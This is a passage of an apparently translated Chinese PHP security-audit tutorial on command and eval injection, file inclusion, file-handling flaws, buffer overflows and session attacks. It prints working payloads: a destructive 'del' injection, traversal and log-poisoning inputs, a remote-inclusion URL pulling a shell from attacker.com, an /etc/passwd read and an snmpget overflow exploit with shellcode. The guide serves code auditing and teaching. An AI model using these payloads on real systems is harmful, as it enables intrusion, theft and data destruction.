2:<\/p>\n<p>\u4e0b\u5217\u4ee3\u7801\u662f\u6765\u81ea\u4e00\u9879\u7ba1\u7406\u7cfb\u7edf\u7684WEB\u7a0b\u5e8f\uff0c\u5b83\u5141\u8bb8\u7528\u6237\u5c01\u88c5\u6279\u5904\u7406\u6587\u4ef6\u8fdb\u884cOracle\u6570\u636e\u5e93\u5907\u4efd\uff0c\u7136\u540e\u8fd0\u884ccleanup.bat\u811a\u672c\u53bb\u6e05\u9664\u4e00\u4e9b\u4e34\u65f6\u6587\u4ef6\u3002rmanDB.bat\u53ef\u63a5\u53d7\u5355\u547d\u4ee4\u884c\u53c2\u6570\uff0c\u7531\u5b83\u6307\u5b9a\u5907\u4efd\u7c7b\u578b\u3002\u56e0\u4e3a\u6570\u636e\u5e93\u8bbf\u95ee\u662f\u53d7\u9650\u7684\uff0c\u5907\u4efd\u7a0b\u5e8f\u9700\u8981\u6743\u9650\u7528\u6237\u624d\u53ef\u6267\u884c\u3002<\/p>\n<p>&lt;?<\/p>\n<p>&#8230;<\/p>\n<p>$btype = $_GET[&#8216;backuptype&#8217;];<\/p>\n<p>$cmd = &#8220;cmd.exe \/K &#8220;c:\\util\\rmanDB.bat &#8221; . $btype . &#8220;&amp;&amp;c:\\utl\\cleanup.<\/p>\n<p>bat&#8221;&#8221;;<\/p>\n<p>system(cmd);<\/p>\n<p>&#8230;<\/p>\n<p>?&gt;<\/p>\n<p>\u8fd9\u4e2a\u95ee\u9898\u4e3b\u8981\u662f\u8bfb\u53d6\u7528\u6237\u6570\u636e\u7684backuptype\u53c2\u6570\u65f6\u672a\u5bf9\u5176\u8fdb\u884c\u4efb\u4f55\u6709\u6548\u5730\u8fc7\u6ee4\u6240\u5bfc\u81f4\u7684\u3002\u7279\u522b\u662f<em>Runtime.exec()<\/em>\u51fd\u6570\u5c06\u4e0d\u80fd\u6267\u884c\u591a\u6761\u547d\u4ee4\uff0c\u4f46\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff0c\u7a0b\u5e8f\u4e3a\u4e86\u5355\u6b21\u8c03\u7528<em>Runtime.exec()<\/em>\u4ee5\u6267\u884c\u591a\u6761\u547d\u4ee4\uff0c\u5b83\u5c31\u5f97\u5148\u53bb\u6267\u884ccmd.exe shell\u3002Shell\u4e00\u7ecf\u8c03\u7528\uff0c\u5b83\u5c06\u4f1a\u5206\u522b\u6267\u884c\u88ab\u70b9\u53f7\u5206\u9694\u7684\u591a\u6761\u547d\u4ee4\u3002\u5982\u679c\u653b\u51fb\u8005\u53d1\u9001\u4e00\u6761\u7ecf\u6076\u610f\u6784\u9020\u7684\u547d\u4ee4&#8221;&amp;&amp; del c:\\dbms\\*.*&#8221;,\u90a3\u4e48\u7a0b\u5e8f\u5c06\u968f\u4e4b\u6267\u884c\u8be5\u6761\u547d\u4ee4\u3002\u7531\u4e8e\u7a0b\u5e8f\u9700\u8981\u4e00\u5b9a\u7684\u6743\u9650\u624d\u80fd\u4e0e\u6570\u636e\u5e93\u4ea4\u4e92\uff0c\u56e0\u6b64\u88ab\u6ce8\u5165\u7684\u4efb\u4f55\u547d\u4ee4\u90fd\u5c06\u4ee5\u6b64\u6743\u9650\u8fd0\u884c\u3002<\/p>\n<p>\u5f53\u7a0b\u5e8f\u5458\u4f7f\u7528eval()\u51fd\u6570\u64cd\u4f5c\u5185\u90e8\u6570\u636e\u65f6\uff0c\u8fd9\u4e9b\u6570\u636e\u90fd\u53ef\u80fd\u4f1a\u88ab\u653b\u51fb\u8005\u5173\u6ce8\u5230\uff0c\u56e0\u4e3a\u5b83\u5f88\u5bb9\u6613\u5bfc\u81f4\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u7684\u53d1\u751f\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$install = $_REQUEST[&#8216;install_command&#8217;];<\/p>\n<p>eval($install);<\/p>\n<p>?&gt;<\/p>\n<p>\u4e0a\u9762\u7684\u4ee3\u7801\u5982\u73ab\u7470\u9999\u4e00\u822c\u8bf1\u4eba\uff0c\u56e0\u4e3a\u5b83\u53ef\u80fd\u88ab\u7528\u6765\u6267\u884c\u4ee3\u7801\u6ce8\u5165\u3002<\/p>\n<p><em>install.php?install_command=phpinfo();<\/em><\/p>\n<p>\u5b9e\u4f8b\u4ee3\u7801\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>[&#8230;]<\/p>\n<p>$register_poll_vars = array(&#8220;id&#8221;,&#8221;template_set&#8221;,&#8221;action&#8221;);<\/p>\n<p>for ($i=0;$i&lt;sizeof($register_poll_vars);$i++) {<\/p>\n<p>if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {<\/p>\n<p>eval(&#8220;$$register_poll_vars[$i] =<\/p>\n<p>&#8220;&#8221;.trim($HTTP_POST_VARS[$register_poll_vars[$i]]).&#8221;&#8221;;&#8221;);<\/p>\n<p>} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {<\/p>\n<p><strong>eval(<\/strong><strong>&#8220;$$register_poll_vars[$i] =<\/strong><\/p>\n<p>&#8220;&#8221;.trim($HTTP_GET_VARS[$register_poll_vars[$i]]).&#8221;&#8221;;&#8221;);<\/p>\n<p>} else {<\/p>\n<p><strong>eval(<\/strong><strong>&#8220;$$register_poll_vars[$i] = &#8221;;&#8221;<\/strong><strong>);<\/strong><\/p>\n<p>}}<\/p>\n<p>[&#8230;]<\/p>\n<p>?&gt;<\/p>\n<p><strong>$$register_poll_vars[$i] <\/strong><strong>\u662f\u7528\u6237\u8f93\u5165\u7684\u53d8\u91cf\u3002<\/strong><\/p>\n<p><em>http:\/\/[target]\/comments.php?id=&#8221;;[PHPCODE]\/\/&amp;template_set=&#8221;;[PHPCODE]\/\/&amp;action=&#8221;;[PHPCODE]\/\/<\/em><\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b\uff1a<\/strong><\/h6>\n<ul>\n<li>http:\/\/www.milw0rm.com\/exploits\/3758<\/li>\n<li>http:\/\/www.milw0rm.com\/exploits\/309<\/li>\n<\/ul>\n<h6><strong>6- <\/strong><strong>\u672c\u5730<\/strong><strong>\/<\/strong><strong>\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b<\/strong><strong>(High):<\/strong><\/h6>\n<p>\u672c\u5730\u6216\u8005\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u662fPHP\u4ee3\u7801\u5ba1\u8ba1\u4e2d\u7684\u9ad8\u5371\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u5b83\u52a0\u8f7d\u672c\u5730\u6216\u8005\u8fdc\u7a0b\u6587\u4ef6\u5230PHP WEB\u9875\u9762\u3002<\/p>\n<p>\u5371\u9669\u51fd\u6570\uff1a<\/p>\n<ul>\n<li><em>include<\/em><\/li>\n<li><em>include_once<\/em><\/li>\n<li><em>require<\/em><\/li>\n<li><em>require_once<\/em><\/li>\n<li><em>show_source<\/em><\/li>\n<li><em>highlight_file<\/em><\/li>\n<li><em>readfile<\/em><\/li>\n<li><em>file_get_contents<\/em><\/li>\n<li><em>fopen<\/em><\/li>\n<li><em>file<\/em><\/li>\n<\/ul>\n<p>\u901a\u5e38\uff0cPHP\u4e2d\u7684\u6bcf\u4e00\u4e2a\u201c\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570\u201d\u90fd\u53ef\u80fd\u662f\u5371\u9669\u7684\uff0c\u53ef\u53c2\u89c1\u8fd9\u91cc\uff1a<\/p>\n<p>http:\/\/ir.php.net\/manual\/en\/ref.filesystem.php<\/p>\n<h6><strong>\u672c\u5730\u6587\u4ef6\u5305\u542b\uff1a<\/strong><\/h6>\n<p>&lt;?php<\/p>\n<p>include(&#8216;..\/geshi.php&#8217;);<\/p>\n<p>if ( isset($_POST[&#8216;submit&#8217;]) ) \/\/*<\/p>\n<p>{<\/p>\n<p>\/\/*<\/p>\n<p>if ( get_magic_quotes_gpc() ) $_POST[&#8216;source&#8217;] =<\/p>\n<p>stripslashes($_POST[&#8216;source&#8217;]);<\/p>\n<p>if ( !strlen(trim($_POST[&#8216;source&#8217;])) )<\/p>\n<p>{<\/p>\n<p>\/\/BUG is HERE<\/p>\n<p><strong>$_POST<\/strong><strong>[<\/strong><strong>&#8216;source&#8217;<\/strong><strong>] = <\/strong><strong>implode<\/strong><strong>(<\/strong><strong>&#8221;<\/strong><strong>, @<\/strong><strong>file<\/strong><strong>(<\/strong><strong>&#8216;..\/geshi\/&#8217; <\/strong><strong>. <\/strong><strong>$_POST<\/strong><strong>[<\/strong><strong>&#8216;language&#8217;<\/strong><strong>] .<\/strong><\/p>\n<p><strong>&#8216;.php&#8217;<\/strong><strong>));<\/strong><\/p>\n<p>$_POST[&#8216;language&#8217;] = &#8216;php&#8217;;<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<p>\u5728\u661f\u53f7*\u6807\u8bb0\u7684\u4e00\u884c\u4e2d\uff0c\u5982\u679c\u5b58\u5728\u53d8\u91cf<em>$_POST [&#8216;submit&#8217;]<\/em>\u548c <em>$_POST [&#8216;language&#8217;],<\/em>\u90a3\u4e48\u4f60\u5c31\u53ef\u4ee5\u8bfb\u53d6\u4efb\u4f55\u7684PHP\u6587\u4ef6\u3002\u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u8bfb\u53d6config.php\u6587\u4ef6\uff01<\/p>\n<h6><strong>Exploit:<\/strong><\/h6>\n<p>&lt;form action=&#8221;http:\/\/[HOST]\/example.php&#8221; method=&#8221;post&#8221;&gt;<\/p>\n<p>Path to file:<\/p>\n<p>example: ..\/..\/..\/..\/config<\/p>\n<p>&lt;textarea name=&#8221;language&#8221;&gt;&lt;\/textarea&gt;<\/p>\n<p>&lt;input type=&#8221;submit&#8221; name=&#8221;submit&#8221; value=&#8221;See&#8221;&gt;<\/p>\n<p>&lt;\/form&gt;<\/p>\n<h6><strong>\u6ce8\u610f\uff1a<\/strong><\/h6>\n<p>\u5728\u672c\u5730\u6587\u4ef6\u5305\u542b\uff08LFI\uff09\u653b\u51fb\u4e2d\uff0c\u653b\u51fb\u8005\u53ef\u8bfb\u53d6\u5bf9\u65b9\u4e3b\u673a\u4e2d\u7684\u4efb\u4f55\u65e5\u5fd7\u6587\u4ef6\u548c\u672c\u5730\u6587\u4ef6\u3002\u4e5f\u8bb8\u8fd9\u79cd\u6587\u4ef6\u6d4f\u89c8\u5e76\u4e0d\u80fd\u9020\u6210\u591a\u5927\u5371\u5bb3\uff0c\u4f46\u653b\u51fb\u8005\u53ef\u5148\u6784\u9020\u4e00\u4e2a\u9519\u8bef\uff0c\u7136\u540e\u8be5\u9519\u8bef\u4f1a\u88ab\u8bb0\u5f55\u5728\u670d\u52a1\u5668\u4e0a\u7684\u65e5\u5fd7\u6587\u4ef6\u4e2d(apache log \/ error log\u7b49\u7b49)\u3002\u5f53\u653b\u51fb\u8005\u5411\u76ee\u6807\u4e3b\u673a\u8bf7\u6c42\u4e00\u4e2a\u672a\u5b58\u5728\u7684\u6587\u4ef6\u65f6\uff1a<\/p>\n<p><em>Test000.php?code=&lt;?php;phpinfo();?&gt;<\/em><\/p>\n<p>\u8fd9\u5c06\u4f1a\u628a\u5168\u8def\u5f84\u5730\u5740\u90fd\u8bb0\u5f55\u5728error.log\u6587\u4ef6\u4e2d\uff08\u5728\u672c\u4f8b\u4e2d\uff0c\u4f60\u7684\u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\u53ef\u80fd\u4e0e\u7b14\u8005\u4e0d\u540c\uff09\uff0c\u4e0e\u6b64\u540c\u65f6\uff0c\u5f53\u6211\u4eec\u5229\u7528LFI\u6f0f\u6d1e\u7684\u53d8\u91cf\u53bb\u52a0\u8f7derror.log\u65f6\uff0c\u653b\u51fb\u8005\u5373\u53ef\u6267\u884c\u81ea\u5df1\u7684PHP\u4ee3\u7801\u3002<\/p>\n<p>\u9ed8\u8ba4\u65e5\u5fd7\u6587\u4ef6\u8def\u5f84\u5217\u8868\uff1a<\/p>\n<p><em>var\/log\/httpd\/access_log<\/em><\/p>\n<p><em>var\/log\/httpd\/error_log<\/em><\/p>\n<p><em>apache\/logs\/error.log<\/em><\/p>\n<p><em>apache\/logs\/access.log<\/em><\/p>\n<p><em>apache\/logs\/error.log<\/em><\/p>\n<p><em>apache\/logs\/access.log<\/em><\/p>\n<p><em>apache\/logs\/error.log<\/em><\/p>\n<p><em>apache\/logs\/access.log<\/em><\/p>\n<p><em>apache\/logs\/error.log<\/em><\/p>\n<p><em>apache\/logs\/access.log<\/em><\/p>\n<p><em>apache\/logs\/error.log<\/em><\/p>\n<p><em>apache\/logs\/access.log<\/em><\/p>\n<p><em>logs\/error.log<\/em><\/p>\n<p><em>logs\/access.log<\/em><\/p>\n<p><em>logs\/error.log<\/em><\/p>\n<p><em>logs\/access.log<\/em><\/p>\n<p><em>logs\/error.log<\/em><\/p>\n<p><em>logs\/access.log<\/em><\/p>\n<p><em>logs\/error.log<\/em><\/p>\n<p><em>logs\/access.log<\/em><\/p>\n<p><em>logs\/error.log<\/em><\/p>\n<p><em>logs\/access.log<\/em><\/p>\n<p><em>etc\/httpd\/logs\/access_log<\/em><\/p>\n<p><em>etc\/httpd\/logs\/access.log<\/em><\/p>\n<p><em>etc\/httpd\/logs\/error_log<\/em><\/p>\n<p><em>etc\/httpd\/logs\/error.log<\/em><\/p>\n<p><em>var\/www\/logs\/access_log<\/em><\/p>\n<p><em>var\/www\/logs\/access.log<\/em><\/p>\n<p><em>usr\/local\/apache\/logs\/access_log<\/em><\/p>\n<p><em>usr\/local\/apache\/logs\/access.log<\/em><\/p>\n<p><em>var\/log\/apache\/access_log<\/em><\/p>\n<p><em>var\/log\/apache\/access.log<\/em><\/p>\n<p><em>var\/log\/access_log<\/em><\/p>\n<p><em>var\/www\/logs\/error_log<\/em><\/p>\n<p><em>var\/www\/logs\/error.log<\/em><\/p>\n<p><em>usr\/local\/apache\/logs\/error_log<\/em><\/p>\n<p><em>usr\/local\/apache\/logs\/error.log<\/em><\/p>\n<p><em>var\/log\/apache\/error_log<\/em><\/p>\n<p><em>var\/log\/apache\/error.log<\/em><\/p>\n<p><em>var\/log\/access_log<\/em><\/p>\n<p><em>var\/log\/error_log<\/em><\/p>\n<p>Example:<\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/2270<\/p>\n<p>\uff08\u8bd1\u6ce8\uff1a\u5173\u4e8e\u66f4\u591a\u7684LFI2RCE\u6280\u672f\u53ef\u4ee5\u53c2\u89c1\u6211\u5728\u535a\u5ba2http:\/\/riusksk.blogbus.com\u4e0a\u5199\u7684\u4e00\u7bc7\u6587\u7ae0\u300a\u5229\u7528PHP\u4ee3\u7801\u5b9e\u73b0LFI2RCE\u300b,\u7f51\u4e0a\u5bf9\u672c\u6587\u7684\u8f6c\u8f7d\u662f\u4e0d\u5b8c\u6574\u7684\uff0c\u56e0\u4e3a\u540e\u6765\u6211\u53c8\u8865\u5199\u4e86\u4e00\u6bb5\u4e0a\u53bb\u3002\uff09<\/p>\n<h6><strong>\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\uff1a<\/strong><\/h6>\n<p>\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\u653b\u51fb\u5141\u8bb8\u6076\u610f\u7528\u6237\u5728\u5b58\u5728\u6f0f\u6d1e\u7684\u4e3b\u673a\u4e0a\u8fd0\u884c\u81ea\u5df1\u7684PHP\u4ee3\u7801\uff0c\u653b\u51fb\u8005\u53ef\u5305\u542b\u5b58\u653e\u5728\u7f51\u4e0a\u7a7a\u95f4\u4e2d\u7528PHP\u7f16\u5199\u7684\u7f51\u9875\uff08\u6076\u610f\uff09\u4ee3\u7801\u3002\u4f8b\u5982\u4e0b\u9762\u7684\u4e00\u6bb5\u6f0f\u6d1e\u4ee3\u7801\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>if (eregi(&#8220;theme.php&#8221;, $_SERVER[&#8216;PHP_SELF&#8217;]))<\/p>\n<p>die();<\/p>\n<p>global $theme, $_FNROOTPATH,$lang; \/\/&lt;&#8211; REQUEST Variable<\/p>\n<p>global $forumback, $forumborder;<\/p>\n<p>$_FN[&#8216;table_background&#8217;]=&amp;$forumback;<\/p>\n<p>$_FN[&#8216;table_border&#8217;]=&amp;$forumborder;<\/p>\n<p>if ($forumback==&#8221;&#8221; &amp;&amp; $forumborder==&#8221;&#8221;){<\/p>\n<p>$forumback=&#8221;ffffff&#8221;;<\/p>\n<p>$forumborder=&#8221;000000&#8243;;<\/p>\n<p>} \/\/ Load File<\/p>\n<p>require_once ($_FNROOTPATH . &#8220;themes\/$theme\/theme.php&#8221;);<\/p>\n<p>&#8230;<\/p>\n<p>?&gt;<\/p>\n<p>Exploit:<\/p>\n<p>\u7531\u4e8e\u53d8\u91cf<em>$_FNROOTPATH<\/em>\u672a\u660e\u786e\u5730\u6307\u5b9a\u6570\u503c\uff0c\u56e0\u6b64\u653b\u51fb\u8005\u53ef\u4ee5\u6ce8\u5165\u672c\u5730\u7684\u6076\u610f\u6587\u4ef6\u5230URL\u4e2d\uff0c\u5e76\u5728\u76ee\u6807\u670d\u52a1\u5668\u4e0a\u6267\u884c\uff1a<\/p>\n<p><em>http:\/\/localhost\/~flatnux\/index.php?_FNROOTPATH=http:\/\/attacker.com\/shell.php%00<\/em><\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b\uff1a<\/strong><\/h6>\n<p>http:\/\/www.milw0rm.com\/exploits\/8066<\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/8025<\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/7939<\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/7969<\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/6817<\/p>\n<p>&nbsp;<\/p>\n<h6><strong>7 \u2013<\/strong><strong>\u6587\u4ef6\u7ba1\u7406<\/strong><strong> (HIGH):<\/strong><\/h6>\n<p>\u6709\u4e9bPHP\u51fd\u6570\u53ef\u7528\u4e8e\u6587\u4ef6\u7ba1\u7406\uff0c\u5982\u679c\u5077\u61d2\u7684\u7a0b\u5e8f\u5458\u6ca1\u6709\u5bf9\u8f93\u5165\u53d8\u91cf\u8fdb\u884c\u5f88\u597d\u5730\u68c0\u6d4b\uff0c\u90a3\u4e48\u5c31\u53ef\u80fd\u9020\u6210\u8fd9\u79cd\u9ad8\u5371\u6f0f\u6d1e\u3002<\/p>\n<p><strong>Copy<\/strong><strong>\u51fd\u6570<\/strong><strong>:<\/strong><\/p>\n<p>&lt;?php<\/p>\n<p>$file = $_GET[&#8216;cpFile&#8217;];<\/p>\n<p>$newfile = &#8220;\/user\/local\/www\/html\/tmp\/file.php&#8221;;<\/p>\n<p>if (!copy($file, $newfile)) {<\/p>\n<p>echo &#8220;failed to copy $file&#8230;n&#8221;;<\/p>\n<p>} else {<\/p>\n<p>echo &#8221; thanks ..&#8221;<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<p>\u653b\u51fb\u8005\u53ef\u4ee5\u590d\u5236\u5176\u5b83\u6587\u4ef6\uff0c\u6bd4\u5982&#8217;\/etc\/passwd&#8217; into &#8216;$newfile&#8217;\uff0c\u7136\u540e\u8bfb\u53d6\u5b83\u3002<\/p>\n<p>http:\/\/victim.com\/index.php?cpfile=\/etc\/passwd<\/p>\n<p>\u5176\u5b83\u5371\u9669\u51fd\u6570\u5982\u4e0b\uff1a<\/p>\n<p><strong>\u6587\u4ef6\u5220\u9664<\/strong><strong> [<\/strong><strong>\u89c1<\/strong><strong>PHP.Net]:<\/strong><\/p>\n<p>Rmdir<\/p>\n<p>unlink<\/p>\n<p>delete<\/p>\n<p>fwrite<\/p>\n<p><strong>\u538b\u7f29<\/strong><strong> &amp; <\/strong><strong>\u89e3\u538b\u7f29\u51fd\u6570<\/strong><strong>:<\/strong><\/p>\n<p>&lt;?php<\/p>\n<p>$file = &#8220;\/tmp\/foo.bz2&#8221;;<\/p>\n<p>$bz = bzopen($file, &#8220;r&#8221;) or die(&#8220;Couldn&#8217;t open $file for reading&#8221;);<\/p>\n<p>bzclose($bz);<\/p>\n<p>?&gt;<\/p>\n<h6><strong>8- <\/strong><strong>\u7f13\u51b2\u533a\u6ea2\u51fa<\/strong><strong> (High, <\/strong><strong>\u4f46\u96be\u5229\u7528<\/strong><strong>):<\/strong><\/h6>\n<p>\u5f53\u7a0b\u5e8f\u5458\u4f7f\u7528\u4e0b\u9762\u7684\u5371\u9669\u51fd\u6570\u65f6:<\/p>\n<ul>\n<li><em>confirm_phpdoc_compiled<\/em><\/li>\n<li><em>mssql_pconnect<\/em><\/li>\n<li><em>mssql_connect<\/em><\/li>\n<li><em>crack_opendict<\/em><\/li>\n<li><em>snmpget<\/em><\/li>\n<li><em>ibase_connect<\/em><\/li>\n<\/ul>\n<p>\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\u5c31\u53ef\u80fd\u53d1\u751f\u5728\u4e0a\u9762\u7684\u51fd\u6570\u4e2d\u3002<\/p>\n<p>\u7f13\u51b2\u533a\u6ea2\u51fa\u4e3e\u4f8b(snmpget()<strong>)<\/strong>\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$host = $_GET[&#8216;host&#8217;];<\/p>\n<p>$timeout = $_GET[&#8216;timeout&#8217;];<\/p>\n<p>$syscontact = snmpget(&#8220;$host&#8221;, &#8220;public&#8221;, &#8220;$timeout&#8221;);<\/p>\n<p>?&gt;<\/p>\n<h6>Exploit:<\/h6>\n<p>&lt;?php<\/p>\n<p>\/\/ PHP 4.4.6 snmpget() object id local buffer overflow poc exploit<\/p>\n<p>\/\/ rgod [-&gt; R.I.P] + Edited By Abysssec INC<\/p>\n<p>\/\/ site: http:\/\/retrogod.altervista.org<\/p>\n<p>\/\/ win xp sp2 version<\/p>\n<p>if (!extension_loaded(&#8220;snmp&#8221;)){<\/p>\n<p>die(&#8220;you need the snmp extension loaded.&#8221;);<\/p>\n<p>}<\/p>\n<p>$____scode=<\/p>\n<p>&#8220;xebx1b&#8221;.<\/p>\n<p>&#8220;x5b&#8221;.<\/p>\n<p>&#8220;x31xc0&#8221;.<\/p>\n<p>&#8220;x50&#8221;.<\/p>\n<p>&#8220;x31xc0&#8221;.<\/p>\n<p>&#8220;x88x43x59&#8221;.<\/p>\n<p>&#8220;x53&#8221;.<\/p>\n<p>&#8220;xbbx6dx13x86x7c&#8221;. \/\/WinExec<\/p>\n<p>&#8220;xffxd3&#8221;.<\/p>\n<p>&#8220;x31xc0&#8221;.<\/p>\n<p>&#8220;x50&#8221;.<\/p>\n<p>&#8220;xbbxdaxcdx81x7c&#8221;. \/\/ExitProcess<\/p>\n<p>&#8220;xffxd3&#8221;.<\/p>\n<p>&#8220;xe8xe0xffxffxff&#8221;.<\/p>\n<p>&#8220;x63x6dx64&#8221;.<\/p>\n<p>&#8220;x2e&#8221;.<\/p>\n<p>&#8220;x65&#8221;.<\/p>\n<p>&#8220;x78x65&#8221;.<\/p>\n<p>&#8220;x20x2f&#8221;.<\/p>\n<p>&#8220;x63x20&#8221;.<\/p>\n<p>&#8220;start notepad &amp; &#8220;;<\/p>\n<p>$edx=&#8221;x64x8fx9bx01&#8243;; \/\/jmp scode<\/p>\n<p>$eip=&#8221;x73xdcx82x7c&#8221;; \/\/0x7C82DC73 jmp edx<\/p>\n<p>$____suntzu=str_repeat(&#8220;A&#8221;,188).$edx.str_repeat(&#8220;A&#8221;,64).$eip.str_repeat(&#8220;x<\/p>\n<p>90&#8221;,48).$____scode.str_repeat(&#8220;x90&#8221;,48);<\/p>\n<p>\/\/more than 256 chars result in simple eip overwrite<\/p>\n<p>$curl = curl_init();<\/p>\n<p>\/\/Send Time out<\/p>\n<p><strong>curl_setopt <\/strong><strong>(<\/strong><strong>$curl<\/strong><strong>, <\/strong><strong>CURLOPT_URL<\/strong><strong>, <\/strong><strong>&#8220;http:\/\/target.com\/snmp.php?host=127.0.<\/strong><\/p>\n<p><strong>0.1&amp;timeout=$____suntzu&#8221;<\/strong><strong>);<\/strong><\/p>\n<p>curl_exec ($curl);<\/p>\n<p>curl_close ($curl);<\/p>\n<p>?&gt;<\/p>\n<h6><strong>9- Cookie \/ Session injection \/ <\/strong><strong>Fixation \/ [High]:<\/strong><\/h6>\n<p>\u4f1a\u8bdd\u5b89\u5168\u662f\u4e00\u4e2a\u9ad8\u7aef\u8bdd\u9898\uff0c\u6210\u4e3a\u88ab\u9891\u7e41\u653b\u51fb\u7684\u76ee\u6807\u4e5f\u5c31\u4e0d\u8db3\u4e3a\u5947\u4e86\u3002\u4e3b\u8981\u7684session\u653b\u51fb\u5305\u62ec\u4f1a\u8bdd\u5192\u5145\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u8bbf\u95ee\u5230\u7531\u5176\u5b83\u7528\u6237\u53d1\u8d77\u7684\u4f1a\u8bdd\u3002\u5bf9\u4e8e\u653b\u51fb\u8005\u800c\u8a00\uff0c\u6700\u4e3a\u91cd\u8981\u7684\u4fe1\u606f\u83ab\u8fc7\u4e8e\u4f1a\u8bddID\uff08session identifier\uff09\uff0c\u56e0\u4e3a\u8fd9\u662f\u5b8c\u6210\u4f1a\u8bdd\u5192\u5145\u653b\u51fb\u5fc5\u5907\u7684\u6761\u4ef6\u3002\u4e0b\u9762\u6709\u4e09\u79cd\u65b9\u6cd5\u53ef\u4ee5\u83b7\u5f97\u4e00\u4e2a\u6709\u6548\u7684\u4f1a\u8bddID\uff1a<\/p>\n<ul>\n<li>\u9884\u6d4b\u6cd5<\/li>\n<li>\u6355\u83b7\u6cd5<\/li>\n<li>\u6ce8\u89c6\u6cd5<\/li>\n<\/ul>\n<p>\u9884\u6d4b\u6cd5\u53ef\u7528\u4e8e\u731c\u6d4b\u6709\u6548\u7684\u4f1a\u8bddID\u3002\u7531\u4e8ePHP\u672c\u6709\u7684\u4f1a\u8bdd\u673a\u5236\uff0c\u4f1a\u8bddID\u90fd\u662f\u975e\u5e38\u968f\u673a\u5316\u7684\uff0c\u56e0\u6b64\u8fd9\u91cc\u5e76\u4e0d\u662f\u6267\u884c\u653b\u51fb\u7684\u6700\u8584\u5f31\u70b9\u3002<\/p>\n<p>\u6355\u83b7\u6709\u6548\u7684\u4f1a\u8bddID\u662f\u6700\u4e3a\u666e\u904d\u7684\u4f1a\u8bdd\u653b\u51fb\u7c7b\u578b\uff0c\u5f53\u7136\uff0c\u8fd9\u8fd8\u6709\u5f88\u591a\u5176\u5b83\u65b9\u6cd5\u3002\u7531\u4e8e\u4f1a\u8bddID\u662f\u5728cookies\u6216\u8005GET\u53d8\u91cf\u4e2d\u4f20\u8f93\u7684\uff0c\u56e0\u6b64\u5404\u79cd\u653b\u51fb\u65b9\u5f0f\u90fd\u4e3b\u8981\u805a\u7126\u4e8e\u8fd9\u4e9b\u4f20\u8f93\u65b9\u5f0f\u3002\u5f53\u6d4f\u89c8\u5668\u5b58\u5728\u4e00\u4e9b\u5173\u4e8ecookies\u7684\u6f0f\u6d1e\u65f6\uff08\u5927\u90e8\u5206\u662f\u53d1\u751f\u5728Internet Explorer\u4e2d\uff09\uff0ccookies\u6bd4GET\u53d8\u91cf\u66dd\u9732\u4f1a\u8bddID\u7684\u673a\u7387\u66f4\u4f4e\uff0c\u56e0\u6b64\u5bf9\u4e8e\u5927\u591a\u6570\u4f7f\u7528cookies\u7684\u7528\u6237\uff0c\u4f60\u53ef\u4ee5\u4e3a\u4ed6\u4eec\u63d0\u4f9b\u4e00\u79cd\u66f4\u4e3a\u5b89\u5168\u7684\u4f20\u8f93\u673a\u5236\u2014\u2014\u5229\u7528cookie\u4f20\u8f93\u4f1a\u8bddID\u3002<\/p>\n<p>\u6ce8\u89c6\u6cd5\u662f\u83b7\u53d6\u6709\u6548\u4f1a\u8bddID\u6700\u4e3a\u7b80\u5355\u7684\u65b9\u5f0f\u3002\u8fd9\u79cd\u65b9\u6cd5\u5f88\u96be\u88ab\u9632\u5fa1\uff0c\u4f46\u5982\u679c\u4f60\u7684\u4f1a\u8bdd\u673a\u5236\u4ec5\u4ec5\u4f7f\u7528session_start()\uff0c\u90a3\u4e48\u5c31\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e\u3002\u4e3a\u4e86\u6f14\u793a\u8fd9\u79cd\u4f1a\u8bdd\u6ce8\u89c6\u6cd5\uff0c\u8bf7\u770b\u4e0b\u9762\u7684\u4ee3\u7801,session.php:<\/p>\n<p>&lt;?php<\/p>\n<p>session_start();<\/p>\n<p>if (!isset($_SESSION[&#8216;visits&#8217;]))<\/p>\n<p>{<\/p>\n<p>$_SESSION[&#8216;visits&#8217;] = 1;<\/p>\n<p>}<\/p>\n<p>else<\/p>\n<p>{<\/p>\n<p>$_SESSION[&#8216;visits&#8217;]++;<\/p>\n<p>}<\/p>\n<p>echo $_SESSION[&#8216;visits&#8217;];<\/p>\n<p>?&gt;<\/p>\n<p>\u5f53\u9996\u6b21\u8bbf\u95ee\u8be5\u9875\u9762\u65f6\uff0c\u4f60\u53ef\u4ee5\u770b\u52301\u88ab\u8f93\u51fa\u5230\u5c4f\u5e55\u4e0a\u3002\u5728\u968f\u540e\u7684\u6bcf\u6b21\u8bbf\u95ee\u4e2d\uff0c\u8be5\u6570\u503c\u5c06\u4f1a\u968f\u4e4b\u589e\u52a0\uff0c\u4ee5\u53cd\u6620\u9875\u9762\u8bbf\u95ee\u6b21\u6570\u3002<\/p>\n<p>\u4e3a\u4e86\u6f14\u793asession 